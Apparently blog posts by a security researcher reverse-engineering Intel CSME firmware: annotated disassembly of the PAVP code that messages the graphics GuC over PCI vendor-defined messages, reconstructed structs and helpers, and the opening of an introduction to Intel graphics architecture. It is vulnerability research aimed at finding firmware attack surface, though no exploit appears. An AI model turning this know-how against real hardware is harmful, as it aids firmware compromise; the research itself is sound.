.text:0010424D                 jz      short send_wake_msg_loop
.text:0010424F                 cmp     eax, PAVP_STATUS_TIMEOUT
.text:00104254                 jnz     short got_awake_msg
.text:00104256
.text:00104256 timeout:                                ; CODE XREF: GUC_send_message+92↓j
.text:00104256                                         ; GUC_send_message+C9↓j
.text:00104256                 mov     edi, PAVP_STATUS_TIMEOUT
.text:0010425B                 jmp     short loc_104297
.text:0010425D ; ---------------------------------------------------------------------------
.text:0010425D

Once the GuC awake message has been received, the actual GuC message is sent, again with GUC_send_VDM().

.text:0010425D got_awake_msg:                          ; CODE XREF: GUC_send_message+55↑j
.text:0010425D                 test    eax, eax
.text:0010425F                 jnz     short loc_1042A8
.text:00104261                 mov     eax, [ebp+csme2guc]
.text:00104264                 push    VDM_FROM_CSME
.text:00104266                 push    dword ptr [eax+CSME2GUC_MSG.command]
.text:00104268                 push    ctx_ptr
.text:00104269                 call    GUC_send_VDM
.text:0010426E                 add     esp, 0Ch
.text:00104271                 mov     edi, eax
.text:00104273                 test    eax, eax
.text:00104275                 jnz     short loc_1042A8
.text:00104277                 push    [ebp+guc2csme]
.text:0010427A                 mov     eax, [ebp+csme2guc]
.text:0010427D                 movzx   eax, [eax+CSME2GUC_MSG.command]
.text:00104280                 push    eax
.text:00104281                 push    ctx_ptr
.text:00104282                 call    GUC_wait_for_message
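
The control flow of the two GUC_send_message() excerpts above can be modelled roughly as follows. This is a sketch under several assumptions: the status values, the message ids, the `link` transport object and `max_attempts` are all placeholders, and the guess that a timeout leads back to the top of the loop is based only on the cross-references in the listing. What happens to the final reply status is not visible in the excerpt, so the sketch simply returns it.

```python
# Placeholder status codes and message ids; the real values are not in the listing.
STATUS_OK, STATUS_TRY_AGAIN, STATUS_TIMEOUT = 0, 1, 2
WAKE_REQ, IS_AWAKE = "wake_req", "is_awake"

def send_message(link, command, max_attempts=3):
    """Model of the retry loop; `link` is a hypothetical transport object."""
    for attempt in range(1, max_attempts + 1):
        if attempt == 1:
            # First pass only: make sure the GuC is not power gated.
            status = link.disable_power_gate()
            if status != STATUS_OK:
                return status
        while True:
            # Wake handshake: send the wake request, then wait for "awake".
            status = link.send_vdm(WAKE_REQ)
            if status != STATUS_OK:
                return status
            status = link.wait_for(IS_AWAKE)
            if status != STATUS_TRY_AGAIN:
                break
        if status == STATUS_TIMEOUT:
            continue  # assumed: a timeout leads back to the top of the loop
        if status != STATUS_OK:
            return status
        # The GuC is awake: send the real command and wait for its reply.
        status = link.send_vdm(command)
        if status != STATUS_OK:
            return status
        return link.wait_for(command)
    return STATUS_TIMEOUT


class FakeLink:
    """Scripted stand-in for the VDM channel, used only to exercise the loop."""
    def __init__(self, wait_results):
        self.wait_results = list(wait_results)
        self.sent = []
    def disable_power_gate(self):
        return STATUS_OK
    def send_vdm(self, msg):
        self.sent.append(msg)
        return STATUS_OK
    def wait_for(self, msg):
        return self.wait_results.pop(0)
```

With `FakeLink([STATUS_TRY_AGAIN, STATUS_OK, STATUS_OK])` the model sends the wake request twice before sending the command, which matches the `jz short send_wake_msg_loop` branch.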

After sending the message, the function waits for the reply in GUC_wait_for_message(). Now you might say: wise guy, how do you know this is actually related to the GuC? What is this VDM stuff? Did Ded Moroz drop them in your cabin?

VDMs are Vendor Defined Messages, a way to send custom messages to devices over a PCI bus. They are sent through IOCTLs to the VDM driver in CSME. The IOCTL gets data through a message:

00000000 IOCTL_VDM_WRITE struc ; (sizeof=0x12, mappedto_145)
00000000 addr_offset     dd ?
00000004 data            dd ?          ; This is a bitfield per the spec
00000008 info            VDM_TX ?
00000012 IOCTL_VDM_WRITE ends
00000000 VDM_TX          struc ; (sizeof=0xA, mappedto_142)
00000000                                         ; XREF: GucCtx/r
00000000                                         ; IOCTL_VDM_WRITE/r
00000000 msg             dd ?                    ; XREF: setup_guc_vdm+F/r
00000004 pci_req_id      dw ?                    ; XREF: setup_guc_vdm+12/w
00000006 tag             dw ?
00000008 pci_tgt_id      dw ?                    ; XREF: setup_guc_vdm+1C/w
0000000A VDM_TX          ends
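
To make the two layouts concrete, here is a minimal Python sketch that packs them with the struct module. It assumes little-endian, unpadded fields, which is what the offsets in the IDA structs imply; the helper name and the argument values in the test are illustrative only.

```python
import struct

# VDM_TX: msg (dd), pci_req_id (dw), tag (dw), pci_tgt_id (dw) = 0xA bytes
VDM_TX = struct.Struct("<IHHH")
# IOCTL_VDM_WRITE: addr_offset (dd), data (dd), info (VDM_TX) = 0x12 bytes
IOCTL_VDM_WRITE = struct.Struct("<II10s")

def build_vdm_write(addr_offset, data, msg, req_id, tag, tgt_id) -> bytes:
    """Serialize one IOCTL_VDM_WRITE record as declared in the structs above."""
    info = VDM_TX.pack(msg, req_id, tag, tgt_id)
    return IOCTL_VDM_WRITE.pack(addr_offset, data, info)
```

The two 16-bit PCI ids sit at the end of the record, so they are easy to spot in a hex dump of the IOCTL buffer.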

The pci_req_id and pci_tgt_id fields in VDM_TX are the first hint of how I connected all this to the GuC. Let's just get the VDM function out of the way:

.text:0014889D VDM_write       proc near               ; CODE XREF: sub_1028DB+CE↑p
.text:0014889D                                         ; GUC_send_VDM+4F↑p ...
.text:0014889D
.text:0014889D var_40          = byte ptr -40h
.text:0014889D vdm_ioctl       = IOCTL_VDM_WRITE ptr -3Ch
.text:0014889D var_10          = dword ptr -10h
.text:0014889D fd              = dword ptr  8
.text:0014889D addr_info       = dword ptr  0Ch
.text:0014889D addr_offset     = dword ptr  10h
.text:0014889D data            = dword ptr  14h
.text:0014889D
.text:0014889D                 push    ebp
.text:0014889E                 mov     ebp, esp
.text:001488A0                 push    edi
.text:001488A1                 push    esi
.text:001488A2                 push    ebx
.text:001488A3                 sub     esp, 34h
.text:001488A6                 mov     ebx, [ebp+fd]
.text:001488A9                 mov     eax, ds:stack_cookie_ptr
.text:001488AE                 mov     [ebp+var_10], eax
.text:001488B1                 xor     eax, eax
.text:001488B3                 mov     edi, [ebp+addr_info]
.text:001488B6                 test    ebx, ebx
.text:001488B8                 js      short invalid_parameter
.text:001488BA                 test    edi, edi
.text:001488BC                 jz      short invalid_parameter
.text:001488BE                 lea     esi, [ebp+vdm_ioctl]
.text:001488C1
.text:001488C1 build_ioctl_data:
.text:001488C1                 push    44 ; sizeof(vdm_ioctl)
.text:001488C3                 push    0
.text:001488C5                 push    esi
.text:001488C6                 call    near ptr memset
.text:001488CB                 mov     eax, [ebp+addr_offset]
.text:001488CE                 mov     [ebp+vdm_ioctl.addr_offset], eax
.text:001488D1                 mov     eax, [ebp+data]
.text:001488D4                 mov     [ebp+vdm_ioctl.data], eax
.text:001488D7                 lea     eax, [ebp+vdm_ioctl.info]
.text:001488DA                 push    0Ah             ; sizeof(TX info)
.text:001488DC                 push    edi
.text:001488DD                 push    0Ah
.text:001488DF                 push    eax
.text:001488E0                 call    near ptr memcpy_s
.text:001488E5                 lea     eax, [ebp+var_40]
.text:001488E8                 push    eax
.text:001488E9                 push    44
.text:001488EB                 push    esi
.text:001488EC                 push    44
.text:001488EE                 push    esi
.text:001488EF                 push    2        ; IOCTL write
.text:001488F1                 push    ebx
.text:001488F2                 call    near ptr ioctl_s

The IOCTL is sent to a file handle. Where is it set? We now go back to the PAVP init code and look for all the places where file handles are initialized. There we find two functions that I am pretty sure initialize the GuC and the Graphics Key Manager (GKM), so I named them GUC_init() and GKM_init() accordingly (I keep reminding you that I named these functions myself; I have no clue what their real names are, these are my guesses).

As usual, the function begins by checking its input argument:

.text:001043C3 GUC_init        proc near               ; CODE XREF: pavp_init+259↑p
.text:001043C3
.text:001043C3 ctx             = dword ptr  8
.text:001043C3
.text:001043C3 ctx_ptr = ebx
.text:001043C3                 push    ebp
.text:001043C4                 mov     ebp, esp
.text:001043C6                 push    esi
.text:001043C7                 push    ctx_ptr
.text:001043C8                 mov     esi, 1005h
.text:001043CD                 mov     ctx_ptr, [ebp+ctx]
.text:001043D0                 test    ctx_ptr, ctx_ptr
.text:001043D2                 jz      invalid_paramter
.text:001043D8                 cmp     [ctx_ptr+PavpCtx.guc_ctx], 0
.text:001043DC                 jnz     invalid_paramter

Next it allocates a context for GuC operations:

.text:001043E2                 push    90 ; sizeof(GucContext)
.text:001043E4                 push    1
.text:001043E6                 call    near ptr calloc ; allocate GucContext (0x5A bytes)
.text:001043EB                 mov     [ctx_ptr+PavpCtx.guc_ctx], eax
.text:001043EE                 test    eax, eax
.text:001043F0                 pop     esi
.text:001043F1                 pop     edx
.text:001043F2                 jnz     short alloc_ok  ; start with no FD

The struct itself:

00000000 GucCtx          struc ; (sizeof=0x5A, mappedto_140)
00000000 vdm_file_descriptor dd ?                ; XREF: GUC_init:alloc_ok/w
00000000                                         ; GUC_init+5C/w ...
00000004 pg_timer        Timer ?
00000028 watchdog        Timer ?                 ; XREF: GUC_command_handler+8C/o
0000004C vdm             VDM_TX ?                ; XREF: GUC_init:loc_104441/o
00000056 state           dd ?                    ; XREF: GUC_pg_timer_routine+39/w
00000056                                         ; GUC_init+127/w
0000005A GucCtx          ends
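
A quick way to sanity-check the struct against the `push 90` in the calloc call is to add up the field sizes. The sketch below does that in Python; the Timer size of 0x24 is not stated anywhere and is inferred from the gap between the pg_timer and watchdog offsets.

```python
# (name, size in bytes); Timer is treated as an opaque 0x24-byte blob,
# a size inferred from the offsets 0x04 and 0x28 in the IDA struct.
FIELDS = [
    ("vdm_file_descriptor", 4),
    ("pg_timer", 0x24),
    ("watchdog", 0x24),
    ("vdm", 0x0A),          # VDM_TX
    ("state", 4),
]

def layout(fields):
    """Return ({name: offset}, total_size) for a packed struct."""
    offsets, pos = {}, 0
    for name, size in fields:
        offsets[name] = pos
        pos += size
    return offsets, pos

offsets, total = layout(FIELDS)
```

The running total comes out at 0x5A, which is the decimal 90 passed to calloc, and it only works out if the struct is packed (state sits at the unaligned offset 0x56).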

GUC_init() first checks whether a file descriptor has already been set up by the Graphics Key Manager, and if so uses the same file descriptor - apparently they share the same VDM channel. In the excerpt below, a descriptor that is still negative at this point leads to the error path (code 0x100E), while a valid one leads to setup_guc_vdm(), which fills in the VDM header. The rest of the code initializes two timers - one related to some kind of watchdog and the other to power management.

.text:0010440C
.text:0010440C alloc_ok:                               ; CODE XREF: GUC_init+2F↑j
.text:0010440C                 mov     [eax+GucCtx.vdm_file_descriptor], 0FFFFFFFFh ; start with no FD
.text:00104412                 mov     eax, [ctx_ptr+PavpCtx.graphic_key_mgr]
.text:00104415                 test    eax, eax
.text:00104417                 jz      short no_gkm
.text:00104419                 mov     edx, [ctx_ptr+PavpCtx.guc_ctx]
.text:0010441C                 mov     eax, [eax+GkmCtx.vdm_file_descriptor]
.text:0010441F                 mov     [edx+GucCtx.vdm_file_descriptor], eax
.text:00104421
.text:00104421 no_gkm:                                 ; CODE XREF: GUC_init+54↑j
.text:00104421                 mov     eax, [ctx_ptr+PavpCtx.guc_ctx]
.text:00104424                 cmp     [eax+GucCtx.vdm_file_descriptor], 0
.text:00104427                 jns     short loc_104441
.text:00104429                 push    4B00FDh
.text:0010442E                 mov     esi, 100Eh
.text:00104433                 push    2
.text:00104435                 call    near ptr log_printf_0
.text:0010443A                 pop     eax
.text:0010443B                 pop     edx
.text:0010443C                 jmp     invalid_paramter
.text:00104441 ; ---------------------------------------------------------------------------
.text:00104441
.text:00104441 loc_104441:                             ; CODE XREF: GUC_init+64↑j
.text:00104441                 add     eax, GucCtx.vdm
.text:00104444                 push    eax
.text:00104445                 call    setup_guc_vdm
.text:0010444A                 mov     esi, eax

And this is the part we have been waiting for:

.text:00102810 setup_guc_vdm   proc near               ; CODE XREF: GKM_init+2D↓p
.text:00102810                                         ; GUC_init+82↓p
.text:00102810
.text:00102810 vdm             = dword ptr  8
.text:00102810
.text:00102810 vdm_ptr = edx
.text:00102810                 push    ebp
.text:00102811                 mov     eax, 1005h
.text:00102816                 mov     ebp, esp
.text:00102818                 mov     vdm_ptr, [ebp+vdm]
.text:0010281B                 test    vdm_ptr, vdm_ptr
.text:0010281D                 jz      short loc_10284A
.text:0010281F                 mov     al, byte ptr [vdm_ptr+(VDM_TX.msg+3)]
.text:00102822                 mov     dword ptr [vdm_ptr+VDM_TX.pci_req_id], 0B0h ; CSME: bus: 0, device: 22, function 0
.text:00102829                 or      eax, 7
.text:0010282C                 mov     [vdm_ptr+VDM_TX.pci_tgt_id], 10h ; GUC: bus: 0, device: 2, function 0
.text:00102832                 and     eax, 0FFFFFF8Fh
.text:00102835                 mov     byte ptr [vdm_ptr], 0D3h
.text:00102838                 mov     [vdm_ptr+3], al
.text:0010283B                 mov     al, [vdm_ptr+2]
.text:0010283E                 or      byte ptr [vdm_ptr+1], 0Fh
.text:00102842                 and     eax, 0FFFFFF80h
.text:00102845                 mov     [vdm_ptr+2], al
.text:00102848                 xor     eax, eax
.text:0010284A
.text:0010284A loc_10284A:                             ; CODE XREF: setup_guc_vdm+D↑j
.text:0010284A                 pop     ebp
.text:0010284B                 retn
.text:0010284B setup_guc_vdm   endp

Here we have the internal bus IDs for the GuC and CSME.
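
The two constants decode with the standard PCI bus/device/function split of a 16-bit ID (8 bits bus, 5 bits device, 3 bits function). A short Python check, with a hypothetical helper name:

```python
def decode_bdf(pci_id: int):
    """Split a 16-bit PCI requester/target ID into (bus, device, function)."""
    bus = (pci_id >> 8) & 0xFF
    device = (pci_id >> 3) & 0x1F
    function = pci_id & 0x07
    return bus, device, function
```

0xB0 decodes to 0:22.0, the usual address of the CSME HECI device, and 0x10 decodes to 0:2.0, the usual address of the integrated graphics device.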

Results are retrieved using GUC_wait_for_message() - it uses select() to wait on the VDM file handle and parses the message. Something interesting I found out is that messages are not initiated only by the CSME - the GuC can initiate messages to the CSME and the CSME responds. GUC_wait_for_message() uses a handler table with 11 entries, but 4 are NULL.
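
The general shape of such a wait routine can be sketched in Python as below. Almost everything here is an assumption made for illustration: the 4-byte message with the id in its low byte, the status values, which table slots are empty, and the choice to report "try again" for unexpected or unhandled messages. Only the select() call on the descriptor and the 11-entry table with 4 empty slots come from the text. A socket pair stands in for the VDM file handle.

```python
import select
import socket
import struct

STATUS_OK, STATUS_TIMEOUT, STATUS_TRY_AGAIN = 0, 1, 2   # placeholder values

def _payload(word):
    # Hypothetical handler: treat everything above the id byte as payload.
    return word >> 8

# 11 entries, 4 of them empty; which slots are empty is a guess.
HANDLERS = [None, _payload, _payload, None, _payload, _payload,
            _payload, _payload, None, _payload, None]

def wait_for_message(sock, expected_id, handlers, timeout=0.1):
    """Wait for one message on sock and run its handler from the table."""
    readable, _, _ = select.select([sock], [], [], timeout)
    if not readable:
        return STATUS_TIMEOUT, None
    raw = sock.recv(4)
    if len(raw) < 4:
        return STATUS_TRY_AGAIN, None
    (word,) = struct.unpack("<I", raw)
    msg_id = word & 0xFF
    handler = handlers[msg_id] if msg_id < len(handlers) else None
    if handler is None:
        return STATUS_TRY_AGAIN, None
    value = handler(word)
    if msg_id != expected_id:
        # A GuC-initiated message was serviced; the caller should wait again.
        return STATUS_TRY_AGAIN, None
    return STATUS_OK, value
```

Running the handler even when the id is not the expected one is one way to model the observation that the GuC can start a conversation on its own.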

For example, one message I decoded gets some production information for the chip:

.text:00103EDA GUC_api_get_production_info proc near
.text:00103EDA
.text:00103EDA var_14          = byte ptr -14h
.text:00103EDA var_13          = byte ptr -13h
.text:00103EDA var_E           = byte ptr -0Eh
.text:00103EDA var_D           = byte ptr -0Dh
.text:00103EDA var_C           = dword ptr -0Ch
.text:00103EDA ctx             = dword ptr  8
.text:00103EDA
.text:00103EDA ctx_ptr = esi
.text:00103EDA                 push    ebp
.text:00103EDB                 mov     ebp, esp
.text:00103EDD                 push    ctx_ptr
.text:00103EDE                 push    ebx
.text:00103EDF                 sub     esp, 0Ch
.text:00103EE2                 mov     [ebp+var_14], 0
.text:00103EE6                 mov     ctx_ptr, [ebp+ctx]
.text:00103EE9                 mov     eax, ds:stack_cookie_ptr
.text:00103EEE                 mov     [ebp+var_C], eax
.text:00103EF1                 xor     eax, eax
.text:00103EF3                 push    ctx_ptr
.text:00103EF4                 call    GUC_enable_power_gate
.text:00103EF9                 lea     eax, [ebp+var_14]
.text:00103EFC                 push    eax
.text:00103EFD                 call    test_byte_12h_from_snowball_rbe_sku
.text:00103F02                 pop     ecx
.text:00103F03                 test    eax, eax
.text:00103F05                 pop     ebx
.text:00103F06                 mov     ebx, 109h
.text:00103F0B                 jnz     short loc_103F48
.text:00103F0D                 mov     ebx, 9
.text:00103F12                 cmp     [ebp+var_14], 0
.text:00103F16                 jnz     short loc_103F48
.text:00103F18                 lea     eax, [ebp+var_13]
.text:00103F1B                 mov     ebx, 109h
.text:00103F20                 push    eax
.text:00103F21                 call    get_7_bytes_from_snowball_rbe_sku
.text:00103F26                 pop     edx
.text:00103F27                 test    eax, eax
.text:00103F29                 jnz     short loc_103F48
.text:00103F2B                 mov     bl, [ebp+var_E]
.text:00103F2E                 mov     al, [ebp+var_D]
.text:00103F31                 shr     bl, 2           ; actual data from CPUs looks like production year & week
.text:00103F34                 and     eax, 0Fh
.text:00103F37                 shl     eax, 9
.text:00103F3A                 and     ebx, 3Fh
.text:00103F3D                 shl     ebx, 0Dh
.text:00103F40                 or      ebx, 109h
.text:00103F46                 or      ebx, eax
.text:00103F48
.text:00103F48 loc_103F48:                             ; CODE XREF: GUC_api_get_production_info+31↑j
.text:00103F48                                         ; GUC_api_get_production_info+3C↑j ...
.text:00103F48                 push    ctx_ptr
.text:00103F49                 call    GUC_enable_power_gate
.text:00103F4E                 push    2
.text:00103F50                 push    ebx
.text:00103F51                 push    ctx_ptr
.text:00103F52                 call    GUC_send_VDM
.text:00103F57                 mov     edx, [ebp+var_C]
.text:00103F5A                 xor     edx, ds:stack_cookie_ptr
.text:00103F60                 jz      short loc_103F67
.text:00103F62                 call    near ptr __stkchk
.text:00103F67
.text:00103F67 loc_103F67:                             ; CODE XREF: GUC_api_get_production_info+86↑j
.text:00103F67                 lea     esp, [ebp-8]
.text:00103F6A                 pop     ebx
.text:00103F6B                 pop     ctx_ptr
.text:00103F6C                 pop     ebp
.text:00103F6D                 retn
.text:00103F6D GUC_api_get_production_info endp

Why do I think this is related to production information? Because it reads data from a file called "/snowball/rbe_sku" (Intel’s name!). I don’t have any idea what Snowball means. RBE usually means ROM Boot Extension, so does it read data from the ROM? The actual data from a few processors appears to correlate with the production year and work week of the CPU.
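
The bit shuffling at the end of GUC_api_get_production_info can be written out as a small Python function. This is a sketch that assumes var_13 is the start of the 7-byte buffer, which makes var_E and var_D its bytes 5 and 6; the function name is hypothetical, and which field is the year and which is the week is not something the listing settles.

```python
def production_info_message(rbe_bytes: bytes) -> int:
    """Build the VDM payload from the 7 bytes read out of /snowball/rbe_sku."""
    field_a = (rbe_bytes[5] >> 2) & 0x3F   # var_E: shr bl, 2 / and ebx, 3Fh
    field_b = rbe_bytes[6] & 0x0F          # var_D: and eax, 0Fh
    # shl ebx, 0Dh / shl eax, 9 / or ebx, 109h / or ebx, eax
    return 0x109 | (field_a << 13) | (field_b << 9)
```

So the reply carries a 6-bit field in bits 13 to 18 and a 4-bit field in bits 9 to 12, on top of the constant 0x109 that is also sent when the file cannot be read.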

.text:00148AF7 test_byte_12h_from_snowball_rbe_sku proc near
.text:00148AF7                                         ; CODE XREF: pavp_init+10A↑p
.text:00148AF7                                         ; GUC_api_get_production_info+23↑p ...
.text:00148AF7
.text:00148AF7 buffer          = byte ptr -24h
.text:00148AF7 stack_cookie    = dword ptr -8
.text:00148AF7 var_4           = dword ptr -4
.text:00148AF7 out_byte_12h    = dword ptr  8
.text:00148AF7
.text:00148AF7                 push    ebp
.text:00148AF8                 mov     ebp, esp
.text:00148AFA                 push    ebx
.text:00148AFB                 sub     esp, 20h
.text:00148AFE                 mov     eax, ds:stack_cookie_ptr
.text:00148B03                 mov     [ebp+stack_cookie], eax
.text:00148B06                 xor     eax, eax
.text:00148B08                 lea     eax, [ebp+buffer]
.text:00148B0B                 push    1Ch
.text:00148B0D                 mov     ebx, [ebp+out_byte_12h]
.text:00148B10                 push    eax
.text:00148B11                 push    offset aSnowballRbeSku_0 ; "/snowball/rbe_sku"
.text:00148B16                 call    read_file_completely
.text:00148B1B                 add     esp, 0Ch
.text:00148B1E                 test    eax, eax
.text:00148B20                 jnz     short loc_148B2A
.text:00148B22                 mov     dl, [ebp+buffer+12h]
.text:00148B25                 and     edx, 1
.text:00148B28                 mov     [ebx], dl
.text:00148B2A
.text:00148B2A loc_148B2A:                             ; CODE XREF: test_byte_12h_from_snowball_rbe_sku+29↑j
.text:00148B2A                 mov     ecx, [ebp+stack_cookie]
.text:00148B2D                 xor     ecx, ds:stack_cookie_ptr
.text:00148B33                 jz      short loc_148B3A
.text:00148B35                 call    near ptr __stkchk
.text:00148B3A
.text:00148B3A loc_148B3A:                             ; CODE XREF: test_byte_12h_from_snowball_rbe_sku+3C↑j
.text:00148B3A                 mov     ebx, [ebp+var_4]
.text:00148B3D                 leave
.text:00148B3E                 retn
.text:00148B3E test_byte_12h_from_snowball_rbe_sku endp

.text:00148A54 read_file_completely proc near          ; CODE XREF: get_7_bytes_from_snowball_rbe_sku+21↓p
.text:00148A54                                         ; test_byte_12h_from_snowball_rbe_sku+1F↓p ...
.text:00148A54
.text:00148A54 filename        = dword ptr  8
.text:00148A54 buffer          = dword ptr  0Ch
.text:00148A54 byte_count      = dword ptr  10h
.text:00148A54
.text:00148A54                 push    ebp
.text:00148A55                 mov     ebp, esp
.text:00148A57                 push    edi
.text:00148A58                 push    esi
.text:00148A59                 push    ebx
.text:00148A5A                 push    0
.text:00148A5C count = esi
.text:00148A5C                 mov     count, [ebp+byte_count]
.text:00148A5F
.text:00148A5F open_file:
.text:00148A5F                 push    [ebp+filename]
.text:00148A62                 call    near ptr open
.text:00148A67 file_handle = ebx
.text:00148A67                 mov     file_handle, eax
.text:00148A69                 pop     eax
.text:00148A6A                 test    file_handle, file_handle
.text:00148A6C                 pop     edx
.text:00148A6D                 mov     eax, 222
.text:00148A72                 js      short loc_148A98
.text:00148A74
.text:00148A74 read_file:
.text:00148A74                 push    count
.text:00148A75                 push    [ebp+buffer]
.text:00148A78                 push    file_handle
.text:00148A79                 call    near ptr read
.text:00148A7E
.text:00148A7E close_file:
.text:00148A7E                 push    file_handle
.text:00148A7F                 mov     edi, eax
.text:00148A81                 call    near ptr close
.text:00148A86                 add     esp, 10h
.text:00148A89                 test    edi, edi
.text:00148A8B                 js      short loc_148A93
.text:00148A8D                 xor     eax, eax
.text:00148A8F                 cmp     edi, count
.text:00148A91                 jz      short loc_148A98
.text:00148A93
.text:00148A93 loc_148A93:                             ; CODE XREF: read_file_completely+37↑j
.text:00148A93                 mov     eax, 99
.text:00148A98
.text:00148A98 loc_148A98:                             ; CODE XREF: read_file_completely+1E↑j
.text:00148A98                                         ; read_file_completely+3D↑j
.text:00148A98                 lea     esp, [ebp-0Ch]
.text:00148A9B                 pop     ebx
.text:00148A9C                 pop     esi
.text:00148A9D                 pop     edi
.text:00148A9E                 pop     ebp
.text:00148A9F                 retn
.text:00148A9F read_file_completely endp
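
A rough C rendering of the two listings above may make the control flow easier to follow. This is only a sketch reconstructed from the disassembly: the status codes 222 and 99, the 0x1C-byte read and the `buffer[0x12] & 1` test come from the listing, while the enum names and the `path` parameter are assumptions added for readability (the firmware hard-codes "/snowball/rbe_sku").

```c
#include <fcntl.h>
#include <stddef.h>
#include <stdint.h>
#include <unistd.h>

/* Status codes seen in the listing; the names are made up for readability. */
enum { READ_OK = 0, READ_ERR_IO = 99, READ_ERR_OPEN = 222 };

/* Mirrors read_file_completely: open, a single read() call, close, and
 * success only if exactly byte_count bytes were returned. */
int read_file_completely(const char *filename, void *buffer, size_t byte_count)
{
    int fd = open(filename, O_RDONLY);   /* the listing pushes 0 as the flags */
    if (fd < 0)
        return READ_ERR_OPEN;

    ssize_t got = read(fd, buffer, byte_count);
    close(fd);

    if (got < 0 || (size_t)got != byte_count)
        return READ_ERR_IO;
    return READ_OK;
}

/* Mirrors test_byte_12h_from_snowball_rbe_sku. The path is a parameter here
 * (an assumption) so the function can be exercised outside the firmware. */
int test_byte_12h(const char *path, uint8_t *out_bit)
{
    uint8_t buffer[0x1C];
    int status = read_file_completely(path, buffer, sizeof buffer);
    if (status == READ_OK)
        *out_bit = buffer[0x12] & 1;     /* only bit 0 of byte 0x12 is kept */
    return status;
}
```

Note that, as in the listing, the output byte is left untouched when the read fails, so callers have to check the returned status.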

Conclusion

I am still actively working on this to see what attack surfaces there are from GuC->CSME and CSME->GuC, but it looks like Intel did a really good job checking bounds and arguments. The Graphics Key Manager is next in the queue, as it looks like the surface there is more promising.

There is also a lot more to decode in PAVP; I only decoded a small part of the context structure:

PavpCtx         struc ; (sizeof=0x80, mappedto_123)
00000000 field_0         dd ?
00000004 field_4         dd ?
00000008 heci_client     dd ?
0000000C server_ctx      dd ?
00000010 graphic_key_mgr dd ?                    ; XREF: GUC_init+4F/r
00000014 vkm             dd ?
00000018 guc_ctx         dd ?                    ; XREF: GUC_pg_timer_routine+32/r
00000018                                         ; GUC_disable_power_gate?+1E/r ...
0000001C Lspcon          dd ?                    ; XREF: LSPCON_command_handler+22/r
0000001C                                         ; LSPCON_playback_done+39/r ...
00000020 field_20        dd ?
00000024 timer_ctx       dd ?                    ; XREF: GUC_disable_power_gate?+56/r
00000024                                         ; GUC_command_handler+90/r ... ; struct offset (PavpPortConfig)
00000028 field_28        dd ?
0000002C port_cfg        PavpPortConfig ?
00000044 field_44        dd ?
00000048 field_48        dd ?
0000004C field_4C        dd ?
00000050 field_50        dd ?
00000054 handlers        dd ?                    ; XREF: GUC_command_handler+29/r
00000058 field_58        dd ?
0000005C field_5C        dd ?
00000060 field_60        dd ?
00000064 field_64        dd ?
00000068 field_68        dd ?
0000006C field_6C        dd ?
00000070 field_70        dd ?
00000074 field_74        dd ?
00000078 field_78        dd ?
0000007C field_7C        dd ?
00000080 PavpCtx         ends
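
For use outside IDA, the same layout can be written as a C struct with compile-time offset checks. This is a sketch under two assumptions: every named field is treated as a plain 32-bit value (the listing only says `dd`), and `PavpPortConfig` is modelled as 0x18 opaque bytes, which is simply the gap between offsets 0x2C and 0x44.

```c
#include <stddef.h>
#include <stdint.h>

/* 0x18 bytes of port configuration that are not decoded here. */
typedef struct { uint8_t raw[0x18]; } PavpPortConfig;

/* Fields are uint32_t so the layout is identical on a 64-bit analysis host. */
typedef struct {
    uint32_t field_0;
    uint32_t field_4;
    uint32_t heci_client;
    uint32_t server_ctx;
    uint32_t graphic_key_mgr;
    uint32_t vkm;
    uint32_t guc_ctx;
    uint32_t Lspcon;
    uint32_t field_20;
    uint32_t timer_ctx;
    uint32_t field_28;
    PavpPortConfig port_cfg;   /* 0x2C..0x43 */
    uint32_t field_44[4];      /* field_44..field_50 */
    uint32_t handlers;         /* 0x54 */
    uint32_t field_58[10];     /* field_58..field_7C */
} PavpCtx;

/* Fail the build if the struct drifts from the offsets in the listing. */
_Static_assert(offsetof(PavpCtx, graphic_key_mgr) == 0x10, "graphic_key_mgr");
_Static_assert(offsetof(PavpCtx, guc_ctx) == 0x18, "guc_ctx");
_Static_assert(offsetof(PavpCtx, timer_ctx) == 0x24, "timer_ctx");
_Static_assert(offsetof(PavpCtx, port_cfg) == 0x2C, "port_cfg");
_Static_assert(offsetof(PavpCtx, handlers) == 0x54, "handlers");
_Static_assert(sizeof(PavpCtx) == 0x80, "PavpCtx size");
```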

Enough for today, especially as my day job has warmed up a bit in the last three weeks - more on that later! I promise it will be very interesting (but not hardware related).

Security of the Intel Graphics Stack - Part 1 - Introduction

10 February 2021 at 05:00

I promised I'd post stuff about low-level hardware issues, and here is my second post on the subject, the first part in a series about the Intel graphics stack.

This post series will be a summary of about a decade of unpublished research I am trying to organize and share. Not all of it is current, as newer hardware is harder to inspect and reverse, but I think much of the research is relevant.

The first post below is a quick introduction to the different hardware and software components we'll need to know before diving into security issues in the next post.

General Architecture

  • Processor graphics - The graphics unit that is part of the processor itself. It has had many names over the years: HD Graphics, UHD Graphics, Iris, Gen9, Gen11, Intel Xe and so on. Even the 'Gen' name has a double meaning - both generation and 'Graphics ENgine'. In UEFI code it is sometimes referred to as the IGD - Integrated Graphics Device.
  • The GuC - an embedded i486 core that supports graphics scheduling, power management and firmware attestation.

  • UEFI and OS Drivers

Core Graphics

As discussed in the introduction to the SecureBoot post, the Intel CPU has four major component groups - the CPU cores, the L3 (or LLC) cache slices, the 'Uncore' or 'System Agent' parts and the processor graphics, all connected through a ring bus inside the die.

Gen9 Architecture

The graphics processor is made up of several slices and an unslice (like uncore) area that includes common components. Each slice is divided into subslices and a slice common area. The subslices are made up of several Execution Units (EUs), a texture unit and an L1 cache/memory. The common area includes the L3 cache and the dataport. The limit to the number of slices is the interconnect between them and the unslice. There is always only a single unslice. In the unslice we can find the connection to the ring bus, aptly named the GT interface (GTI); the Command Streamer, which reads commands from system memory into the graphics processor; the fixed function pipeline (FF pipeline); and the thread dispatcher & spawner that launch shader programs and GPGPU (General Purpose GPU computing) programs onto the EUs. The FF pipeline deals with fixed functions such as vertex operations (called the Geometry Pipe), and other dedicated hardware such as video transcoding.

Different SKUs have different combinations of these. For example:

  • Skylake GT2: 1 slice of 3 subslices of 8 EUs (1x3x8)
  • Skylake GT3: 2x3x8
  • Skylake GT4: 3x3x8
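
The slices x subslices x EUs notation multiplies out to the total EU count. A minimal sketch, where the struct and function names are hypothetical and only the three configurations listed above are taken from the text:

```c
/* Hypothetical description of a GT configuration in slices x subslices x EUs form. */
typedef struct {
    unsigned slices;
    unsigned subslices_per_slice;
    unsigned eus_per_subslice;
} GtConfig;

/* Total number of execution units for a configuration. */
unsigned total_eus(GtConfig c)
{
    return c.slices * c.subslices_per_slice * c.eus_per_subslice;
}

/* The three Skylake examples from the list above. */
static const GtConfig SKYLAKE_GT2 = { 1, 3, 8 };
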